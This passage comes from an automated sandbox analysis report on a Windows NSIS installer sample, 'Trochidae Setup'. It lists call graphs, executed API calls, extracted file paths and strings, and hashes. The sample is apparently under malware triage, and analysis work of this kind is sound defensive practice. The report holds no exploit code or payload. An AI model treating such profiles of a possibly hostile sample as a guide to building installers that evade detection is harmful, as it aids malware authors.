SetCurrentDirectoryA 4802 4035e3 4801->4802 4803 4035d8 4801->4803 4938 405fda lstrcpynA 4802->4938 4937 405fda lstrcpynA 4803->4937 4806 405ffc 17 API calls 4807 403622 DeleteFileA 4806->4807 4808 40362f CopyFileA 4807->4808 4813 4035f1 4807->4813 4808->4813 4809 403677 4811 405db9 36 API calls 4809->4811 4810 405db9 36 API calls 4810->4813 4811->4759 4812 405ffc 17 API calls 4812->4813 4813->4806 4813->4809 4813->4810 4813->4812 4815 403663 CloseHandle 4813->4815 4939 405679 CreateProcessA 4813->4939 4815->4813 4816->4741 4817->4743 4819 406244 5 API calls 4818->4819 4821 403210 4819->4821 4820 40321a 4820->4749 4821->4820 4822 405972 3 API calls 4821->4822 4823 403222 4822->4823 4824 405644 2 API calls 4823->4824 4825 403228 4824->4825 4826 405ba2 2 API calls 4825->4826 4827 403233 4826->4827 4827->4749 4942 405b73 GetFileAttributesA CreateFileA 4828->4942 4830 402e04 4849 402e14 4830->4849 4943 405fda lstrcpynA 4830->4943 4832 402e2a 4833 4059b9 2 API calls 4832->4833 4834 402e30 4833->4834 4944 405fda lstrcpynA 4834->4944 4836 402e3b GetFileSize 4837 402f35 4836->4837 4851 402e52 4836->4851 4945 402d60 4837->4945 4839 402f3e 4841 402f6e GlobalAlloc 4839->4841 4839->4849 4981 4031ed SetFilePointer 4839->4981 4956 4031ed SetFilePointer 4841->4956 4843 402fa1 4845 402d60 6 API calls 4843->4845 4845->4849 4846 402f57 4850 4031d7 ReadFile 4846->4850 4847 402f89 4957 402ffb 4847->4957 4849->4756 4852 402f62 4850->4852 4851->4837 4851->4843 4851->4849 4853 402d60 6 API calls 4851->4853 4978 4031d7 4851->4978 4852->4841 4852->4849 4853->4851 4854 402f95 4854->4849 4854->4854 4855 402fd2 SetFilePointer 4854->4855 4855->4849 4857 406372 5 API calls 4856->4857 4858 40380b 4857->4858 4859 403811 4858->4859 4860 403823 4858->4860 5009 405f38 wsprintfA 4859->5009 4861 405ec1 3 API calls 4860->4861 4862 40384e 4861->4862 4864 40386c lstrcatA 4862->4864 4866 405ec1 3 API calls 4862->4866 4865 403821 4864->4865 4994 403abc 4865->4994 4866->4864 4869 405a60 18 API calls 4870 40389e 4869->4870 4871 403927 4870->4871 4873 405ec1 3 API calls 4870->4873 4872 405a60 18 API calls 4871->4872 4874 40392d 4872->4874 4875 4038ca 4873->4875 4876 40393d LoadImageA 4874->4876 4877 405ffc 17 API calls 4874->4877 4875->4871 4880 4038e6 lstrlenA 4875->4880 4884 40599d CharNextA 4875->4884 4878 4039e3 4876->4878 4879 403964 RegisterClassA 4876->4879 4877->4876 4883 40140b 2 API calls 4878->4883 4881 4039ed 4879->4881 4882 40399a SystemParametersInfoA CreateWindowExA 4879->4882 4885 4038f4 lstrcmpiA 4880->4885 4886 40391a 4880->4886 4881->4759 4882->4878 4887 4039e9 4883->4887 4889 4038e4 4884->4889 4885->4886 4890 403904 GetFileAttributesA 4885->4890 4888 405972 3 API calls 4886->4888 4887->4881 4891 403abc 18 API calls 4887->4891 4892 403920 4888->4892 4889->4880 4893 403910 4890->4893 4894 4039fa 4891->4894 5010 405fda lstrcpynA 4892->5010 4893->4886 4896 4059b9 2 API calls 4893->4896 4897 403a06 ShowWindow 4894->4897 4898 403a89 4894->4898 4896->4886 4899 406304 3 API calls 4897->4899 5002 4051d3 OleInitialize 4898->5002 4902 403a1e 4899->4902 4901 403a8f 4903 403a93 4901->4903 4904 403aab 4901->4904 4905 403a2c GetClassInfoA 4902->4905 4907 406304 3 API calls 4902->4907 4903->4881 4910 40140b 2 API calls 4903->4910 4906 40140b 2 API calls 4904->4906 4908 403a40 GetClassInfoA RegisterClassA 4905->4908 4909 403a56 DialogBoxParamA 4905->4909 4906->4881 4907->4905 4908->4909 4911 40140b 2 API calls 4909->4911 4910->4881 4911->4881 4912->4747 4913->4796 4914->4762 4916 403735 4915->4916 4917 403727 CloseHandle 4915->4917 5012 403762 4916->5012 4917->4916 4920 4057a2 67 API calls 4921 403554 OleUninitialize 4920->4921 4921->4770 4921->4771 4923 40570b 4922->4923 4924 403573 ExitProcess 4923->4924 4925 40571f MessageBoxIndirectA 4923->4925 4925->4924 4927 406372 5 API calls 4926->4927 4928 403580 lstrcatA 4927->4928 4928->4788 4928->4789 4930 4035c2 4929->4930 4931 405618 GetLastError 4929->4931 4930->4801 4931->4930 4932 405627 SetFileSecurityA 4931->4932 4932->4930 4933 40563d GetLastError 4932->4933 4933->4930 4935 405654 4934->4935 4936 405658 GetLastError 4934->4936 4935->4801 4936->4935 4937->4802 4938->4813 4940 4056b8 4939->4940 4941 4056ac CloseHandle 4939->4941 4940->4813 4941->4940 4942->4830 4943->4832 4944->4836 4946 402d81 4945->4946 4947 402d69 4945->4947 4950 402d91 GetTickCount 4946->4950 4951 402d89 4946->4951 4948 402d72 DestroyWindow 4947->4948 4949 402d79 4947->4949 4948->4949 4949->4839 4952 402dc2 4950->4952 4953 402d9f CreateDialogParamA ShowWindow 4950->4953 4982 4063ae 4951->4982 4952->4839 4953->4952 4956->4847 4959 403011 4957->4959 4958 40303c 4960 4031d7 ReadFile 4958->4960 4959->4958 4993 4031ed SetFilePointer 4959->4993 4962 403047 4960->4962 4963 403161 4962->4963 4964 403177 4962->4964 4965 403059 GetTickCount 4962->4965 4963->4854 4966 40317b 4964->4966 4970 403193 4964->4970 4971 40306c 4965->4971 4967 4031d7 ReadFile 4966->4967 4967->4963 4968 4031d7 ReadFile 4968->4970 4969 4031d7 ReadFile 4969->4971 4970->4963 4970->4968 4972 405c1a WriteFile 4970->4972 4971->4963 4971->4969 4974 4030d2 GetTickCount 4971->4974 4975 4030fb MulDiv wsprintfA 4971->4975 4977 405c1a WriteFile 4971->4977 4986 4064b7 4971->4986 4972->4970 4974->4971 4976 405101 24 API calls 4975->4976 4976->4971 4977->4971 4979 405beb ReadFile 4978->4979 4980 4031ea 4979->4980 4980->4851 4981->4846 4983 4063cb PeekMessageA 4982->4983 4984 4063c1 DispatchMessageA 4983->4984 4985 402d8f 4983->4985 4984->4983 4985->4839 4987 4064dc 4986->4987 4988 4064e4 4986->4988 4987->4971 4988->4987 4989 406574 GlobalAlloc 4988->4989 4990 40656b GlobalFree 4988->4990 4991 4065e2 GlobalFree 4988->4991 4992 4065eb GlobalAlloc 4988->4992 4989->4987 4989->4988 4990->4989 4991->4992 4992->4987 4992->4988 4993->4958 4995 403ad0 4994->4995 5011 405f38 wsprintfA 4995->5011 4997 403b41 4998 403b75 18 API calls 4997->4998 5000 403b46 4998->5000 4999 40387c 4999->4869 5000->4999 5001 405ffc 17 API calls 5000->5001 5001->5000 5003 4040b4 SendMessageA 5002->5003 5004 4051f6 5003->5004 5007 401389 2 API calls 5004->5007 5008 40521d 5004->5008 5005 4040b4 SendMessageA 5006 40522f OleUninitialize 5005->5006 5006->4901 5007->5004 5008->5005 5009->4865 5010->4871 5011->4997 5013 403770 5012->5013 5014 40373a 5013->5014 5015 403775 FreeLibrary GlobalFree 5013->5015 5014->4920 5015->5014 5015->5015 5788 4037b5 5789 4037c0 5788->5789 5790 4037c7 GlobalAlloc 5789->5790 5791 4037c4 5789->5791 5790->5791 5792 4014b7 5793 4014bd 5792->5793 5794 401389 2 API calls 5793->5794 5795 4014c5 5794->5795 5796 402138 5797 402b2c 17 API calls 5796->5797 5798 40213f 5797->5798 5799 402b2c 17 API calls 5798->5799 5800 402149 5799->5800 5801 402b2c 17 API calls 5800->5801 5802 402153 5801->5802 5803 402b2c 17 API calls 5802->5803 5804 40215d 5803->5804 5805 402b2c 17 API calls 5804->5805 5806 402167 5805->5806 5807 4021a9 CoCreateInstance 5806->5807 5808 402b2c 17 API calls 5806->5808 5811 4021c8 5807->5811 5813 402273 5807->5813 5808->5807 5809 401423 24 API calls 5810 4022a9 5809->5810 5812 402253 MultiByteToWideChar 5811->5812 5811->5813 5812->5813 5813->5809 5813->5810 5070 4015bb 5071 402b2c 17 API calls 5070->5071 5072 4015c2 5071->5072 5073 405a0b 4 API calls 5072->5073 5086 4015ca 5073->5086 5074 401624 5076 401652 5074->5076 5077 401629 5074->5077 5075 40599d CharNextA 5075->5086 5079 401423 24 API calls 5076->5079 5078 401423 24 API calls 5077->5078 5080 401630 5078->5080 5085 40164a 5079->5085 5089 405fda lstrcpynA 5080->5089 5081 405644 2 API calls 5081->5086 5083 40163b SetCurrentDirectoryA 5083->5085 5084 405661 5 API calls 5084->5086 5086->5074 5086->5075 5086->5081 5086->5084 5087 40160c GetFileAttributesA 5086->5087 5088 4055c7 4 API calls 5086->5088 5087->5086 5088->5086 5089->5083 5814 40273b 5815 402741 5814->5815 5816 402745 FindNextFileA 5815->5816 5818 402757 5815->5818 5817 402796 5816->5817 5816->5818 5820 405fda lstrcpynA 5817->5820 5820->5818 5821 4016bb 5822 402b2c 17 API calls 5821->5822 5823 4016c1 GetFullPathNameA 5822->5823 5825 4016d8 5823->5825 5830 4016f9 5823->5830 5824 40170d GetShortPathNameA 5827 4029b8 5824->5827 5826 4062dd 2 API calls 5825->5826 5825->5830 5828 4016e9 5826->5828 5828->5830 5831 405fda lstrcpynA 5828->5831 5830->5824 5830->5827 5831->5830 5090 40243d 5091 402b2c 17 API calls 5090->5091 5092 40244f 5091->5092 5093 402b2c 17 API calls 5092->5093 5094 402459 5093->5094 5107 402bbc 5094->5107 5097 4029b8 5098 40248e 5099 40249a 5098->5099 5101 402b0a 17 API calls 5098->5101 5102 4024b9 RegSetValueExA 5099->5102 5104 402ffb 35 API calls 5099->5104 5100 402b2c 17 API calls 5103 402487 lstrlenA 5100->5103 5101->5099 5105 4024cf RegCloseKey 5102->5105 5103->5098 5104->5102 5105->5097 5108 402bd7 5107->5108 5111 405e8e 5108->5111 5112 405e9d 5111->5112 5113 402469 5112->5113 5114 405ea8 RegCreateKeyExA 5112->5114 5113->5097 5113->5098 5113->5100 5114->5113 5125 40523f 5126 405261 GetDlgItem GetDlgItem GetDlgItem 5125->5126 5127 4053ea 5125->5127 5171 40409d SendMessageA 5126->5171 5129 4053f2 GetDlgItem CreateThread CloseHandle 5127->5129 5130 40541a 5127->5130 5129->5130 5174 4051d3 5 API calls 5129->5174 5131 405448 5130->5131 5133 405430 ShowWindow ShowWindow 5130->5133 5134 405469 5130->5134 5135 405450 5131->5135 5136 4054a3 5131->5136 5132 4052d1 5137 4052d8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5132->5137 5173 40409d SendMessageA 5133->5173 5141 4040cf 8 API calls 5134->5141 5139 405458 5135->5139 5140 40547c ShowWindow 5135->5140 5136->5134 5144 4054b0 SendMessageA 5136->5144 5142 405346 5137->5142 5143 40532a SendMessageA SendMessageA 5137->5143 5145 404041 SendMessageA 5139->5145 5147 40549c 5140->5147 5148 40548e 5140->5148 5146 405475 5141->5146 5149 405359 5142->5149 5150 40534b SendMessageA 5142->5150 5143->5142 5144->5146 5151 4054c9 CreatePopupMenu 5144->5151 5145->5134 5153 404041 SendMessageA 5147->5153 5152 405101 24 API calls 5148->5152 5155 404068 18 API calls 5149->5155 5150->5149 5154 405ffc 17 API calls 5151->5154 5152->5147 5153->5136 5156 4054d9 AppendMenuA 5154->5156 5157 405369 5155->5157 5158 4054f7 GetWindowRect 5156->5158 5159 40550a TrackPopupMenu 5156->5159 5160 405372 ShowWindow 5157->5160 5161 4053a6 GetDlgItem SendMessageA 5157->5161 5158->5159 5159->5146 5162 405526 5159->5162 5163 405395 5160->5163 5164 405388 ShowWindow 5160->5164 5161->5146 5165 4053cd SendMessageA SendMessageA 5161->5165 5166 405545 SendMessageA 5162->5166 5172 40409d SendMessageA 5163->5172 5164->5163 5165->5146 5166->5166 5167 405562 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5166->5167 5169 405584 SendMessageA 5167->5169 5169->5169 5170 4055a6 GlobalUnlock SetClipboardData CloseClipboard 5169->5170 5170->5146 5171->5132 5172->5161 5173->5131 5832 401b3f 5833 402b2c 17 API calls 5832->5833 5834 401b46 5833->5834 5835 402b0a 17 API calls 5834->5835 5836 401b4f wsprintfA 5835->5836 5837 4029b8 5836->5837

                                                                                        Executed Functions

                                                                                        Function 00403235 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 403235-403274 SetErrorMode GetVersion 1 403276-40327e call 406372 0->1 2 403287 0->2 1->2 7 403280 1->7 4 40328c-40329f call 406304 lstrlenA 2->4 9 4032a1-4032bd call 406372 * 3 4->9 7->2 16 4032ce-40332c #17 OleInitialize SHGetFileInfoA call 405fda GetCommandLineA call 405fda 9->16 17 4032bf-4032c5 9->17 24 403338-40334d call 40599d CharNextA 16->24 25 40332e-403333 16->25 17->16 21 4032c7 17->21 21->16 28 403412-403416 24->28 25->24 29 403352-403355 28->29 30 40341c 28->30 31 403357-40335b 29->31 32 40335d-403365 29->32 33 40342f-403449 GetTempPathA call 403204 30->33 31->31 31->32 34 403367-403368 32->34 35 40336d-403370 32->35 42 4034a1-4034bb DeleteFileA call 402dc4 33->42 43 40344b-403469 GetWindowsDirectoryA lstrcatA call 403204 33->43 34->35 37 403402-40340f call 40599d 35->37 38 403376-40337a 35->38 37->28 53 403411 37->53 40 403392-4033bf 38->40 41 40337c-403382 38->41 49 4033c1-4033c7 40->49 50 4033d2-403400 40->50 47 403384-403386 41->47 48 403388 41->48 58 4034c1-4034c7 42->58 59 40354f-40355f call 40371d OleUninitialize 42->59 43->42 61 40346b-40349b GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403204 43->61 47->40 47->48 48->40 54 4033c9-4033cb 49->54 55 4033cd 49->55 50->37 57 40341e-40342a call 405fda 50->57 53->28 54->50 54->55 55->50 57->33 62 4034c9-4034d4 call 40599d 58->62 63 40353f-403546 call 4037f7 58->63 72 403683-403689 59->72 73 403565-403575 call 4056f6 ExitProcess 59->73 61->42 61->59 74 4034d6-4034ff 62->74 75 40350a-403514 62->75 70 40354b 63->70 70->59 77 403705-40370d 72->77 78 40368b-4036a4 GetCurrentProcess OpenProcessToken 72->78 79 403501-403503 74->79 82 403516-403523 call 405a60 75->82 83 40357b-40358f call 405661 lstrcatA 75->83 80 403713-403717 ExitProcess 77->80 81 40370f 77->81 85 4036d6-4036e4 call 406372 78->85 86 4036a6-4036d0 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 88 403505-403508 79->88 81->80 82->59 96 403525-40353b call 405fda * 2 82->96 97 403591-403597 lstrcatA 83->97 98 40359c-4035b6 lstrcatA lstrcmpiA 83->98 94 4036f2-4036fc ExitWindowsEx 85->94 95 4036e6-4036f0 85->95 86->85 88->75 88->79 94->77 100 4036fe-403700 call 40140b 94->100 95->94 95->100 96->63 97->98 98->59 99 4035b8-4035bb 98->99 102 4035c4 call 405644 99->102 103 4035bd-4035c2 call 4055c7 99->103 100->77 112 4035c9-4035d6 SetCurrentDirectoryA 102->112 103->112 113 4035e3-40360b call 405fda 112->113 114 4035d8-4035de call 405fda 112->114 118 403611-40362d call 405ffc DeleteFileA 113->118 114->113 121 40366e-403675 118->121 122 40362f-40363f CopyFileA 118->122 121->118 124 403677-40367e call 405db9 121->124 122->121 123 403641-403661 call 405db9 call 405ffc call 405679 122->123 123->121 133 403663-40366a CloseHandle 123->133 124->59 133->121
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE ref: 0040325A
                                                                                        • GetVersion.KERNEL32 ref: 00403260
                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
                                                                                        • #17.COMCTL32(?,00000006,?,0000000A), ref: 004032CF
                                                                                        • OleInitialize.OLE32(00000000), ref: 004032D6
                                                                                        • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,?,00000000,?,00000006,?,0000000A), ref: 004032F2
                                                                                        • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00403307
                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\jU0hAXFL0k.exe",00000020,"C:\Users\user\Desktop\jU0hAXFL0k.exe",00000000,?,00000006,?,0000000A), ref: 00403343
                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,?,0000000A), ref: 00403440
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 00403451
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 0040345D
                                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403471
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403479
                                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040348A
                                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403492
                                                                                        • DeleteFileA.KERNELBASE(1033,?,00000006,?,0000000A), ref: 004034A6
                                                                                          • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                          • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                          • Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,76403410), ref: 004038E7
                                                                                          • Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
                                                                                          • Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                                                          • Part of subcall function 004037F7: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                                                          • Part of subcall function 004037F7: RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                                                          • Part of subcall function 0040371D: CloseHandle.KERNEL32(000002E0,00403554,?,?,00000006,?,0000000A), ref: 00403728
                                                                                        • OleUninitialize.OLE32(?,?,00000006,?,0000000A), ref: 00403554
                                                                                        • ExitProcess.KERNEL32 ref: 00403575
                                                                                        • GetCurrentProcess.KERNEL32(?,?,00000006,?,0000000A), ref: 00403692
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403699
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
                                                                                        • ExitProcess.KERNEL32 ref: 00403717
                                                                                          • Part of subcall function 004056F6: MessageBoxIndirectA.USER32(00409218), ref: 00405751
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                        • String ID: "$"C:\Users\user\Desktop\jU0hAXFL0k.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$C:\Users\user\Desktop$C:\Users\user\Desktop\jU0hAXFL0k.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KAv$~nsu
                                                                                        • API String ID: 3776617018-374525210
                                                                                        • Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                                                        • Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
                                                                                        • Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                                                        • Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040523F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 134 40523f-40525b 135 405261-405328 GetDlgItem * 3 call 40409d call 40498e GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053ea-4053f0 134->136 154 405346-405349 135->154 155 40532a-405344 SendMessageA * 2 135->155 138 4053f2-405414 GetDlgItem CreateThread CloseHandle 136->138 139 40541a-405426 136->139 138->139 140 405448-40544e 139->140 141 405428-40542e 139->141 145 405450-405456 140->145 146 4054a3-4054a6 140->146 143 405430-405443 ShowWindow * 2 call 40409d 141->143 144 405469-405470 call 4040cf 141->144 143->140 158 405475-405479 144->158 151 405458-405464 call 404041 145->151 152 40547c-40548c ShowWindow 145->152 146->144 149 4054a8-4054ae 146->149 149->144 156 4054b0-4054c3 SendMessageA 149->156 151->144 159 40549c-40549e call 404041 152->159 160 40548e-405497 call 405101 152->160 161 405359-405370 call 404068 154->161 162 40534b-405357 SendMessageA 154->162 155->154 163 4055c0-4055c2 156->163 164 4054c9-4054f5 CreatePopupMenu call 405ffc AppendMenuA 156->164 159->146 160->159 173 405372-405386 ShowWindow 161->173 174 4053a6-4053c7 GetDlgItem SendMessageA 161->174 162->161 163->158 171 4054f7-405507 GetWindowRect 164->171 172 40550a-405520 TrackPopupMenu 164->172 171->172 172->163 175 405526-405540 172->175 176 405395 173->176 177 405388-405393 ShowWindow 173->177 174->163 178 4053cd-4053e5 SendMessageA * 2 174->178 179 405545-405560 SendMessageA 175->179 180 40539b-4053a1 call 40409d 176->180 177->180 178->163 179->179 181 405562-405582 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405584-4055a4 SendMessageA 181->183 183->183 184 4055a6-4055ba GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040529E
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004052AD
                                                                                        • GetClientRect.USER32(?,?), ref: 004052EA
                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004052F1
                                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405312
                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405323
                                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405336
                                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405344
                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405357
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405379
                                                                                        • ShowWindow.USER32(?,?), ref: 0040538D
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004053AE
                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053BE
                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053D7
                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053E3
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004052BC
                                                                                          • Part of subcall function 0040409D: SendMessageA.USER32(?,?,?,00403ECD), ref: 004040AB
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004053FF
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000051D3,00000000), ref: 0040540D
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405414
                                                                                        • ShowWindow.USER32(00000000), ref: 00405437
                                                                                        • ShowWindow.USER32(?,?), ref: 0040543E
                                                                                        • ShowWindow.USER32(?), ref: 00405484
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054B8
                                                                                        • CreatePopupMenu.USER32 ref: 004054C9
                                                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054DE
                                                                                        • GetWindowRect.USER32(?,000000FF), ref: 004054FE
                                                                                        • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405517
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405553
                                                                                        • OpenClipboard.USER32(00000000), ref: 00405563
                                                                                        • EmptyClipboard.USER32 ref: 00405569
                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405572
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040557C
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405590
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004055A9
                                                                                        • SetClipboardData.USER32(?,00000000), ref: 004055B4
                                                                                        • CloseClipboard.USER32 ref: 004055BA
                                                                                        Strings
                                                                                        • Trochidae Setup: Installing, xrefs: 0040552F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID: Trochidae Setup: Installing
                                                                                        • API String ID: 590372296-4121273588
                                                                                        • Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                                                        • Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
                                                                                        • Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                                                        • Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004057A2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
